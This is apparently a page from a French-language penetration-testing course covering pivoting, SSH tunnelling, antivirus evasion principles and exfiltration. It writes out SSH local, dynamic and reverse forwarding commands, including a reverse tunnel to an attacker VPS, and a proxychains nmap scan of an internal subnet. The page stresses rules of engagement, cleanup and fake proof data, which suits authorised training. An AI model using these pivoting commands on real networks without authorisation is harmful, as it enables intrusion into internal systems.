Semaine 11 — Mouvements latéraux et exfiltration
Objectifs pédagogiques
- Utiliser un hôte compromis comme pivot vers un segment interne.
- Établir des tunnels SSH stables, réversibles, journalisables.
- Comprendre l'évasion antivirus sans en faire un objectif en soi.
Le pivot en une phrase
Un pivot transforme l'hôte compromis en relais. Sans pivot, la reconnaissance interne est impossible depuis l'extérieur.
Trois techniques de tunnel
# Redirection locale : le poste attaquant expose un port qui atteint un service interne.
ssh -L 8080:10.1.1.20:80 utilisateur@pivot
# Redirection dynamique : SOCKS5 côté attaquant, tout le trafic sort par le pivot.
ssh -D 1080 utilisateur@pivot
# Redirection inverse : la cible se connecte vers vous. Utile derrière un NAT.
ssh -R 4444:localhost:22 attaquant@vps
Utilisation avec Proxychains :
# /etc/proxychains.conf
socks5 127.0.0.1 1080
proxychains -q nmap -sT -Pn 10.1.1.0/24
Reconnaissance interne responsable
Sur un réseau interne, un scan agressif casse des services (imprimantes, automates). Descendre
en -T2, se limiter aux ports pertinents pour l'objectif, ne jamais scanner l'ensemble d'un
segment industriel sans autorisation explicite dans le RoE.
Évasion antivirus — Ce qu'il faut savoir
L'évasion est un domaine mouvant. Ce qui compte en pentest professionnel :
- Documenter les techniques testées : la valeur pour le client est de savoir ce qui a été détecté, pas seulement ce qui a fonctionné.
- Ne pas déposer de charge persistante sans autorisation explicite : c'est une ligne rouge du RoE quasi systématique.
- Nettoyer chaque hôte à la fin d'un test : fichiers, comptes, tâches planifiées.
Exfiltration
La règle : exfiltrer de fausses données pour prouver le canal, jamais des données réelles
du client. Un fichier PROOF_OF_EXFIL_2026-08-08.txt chiffré et daté suffit à la démonstration.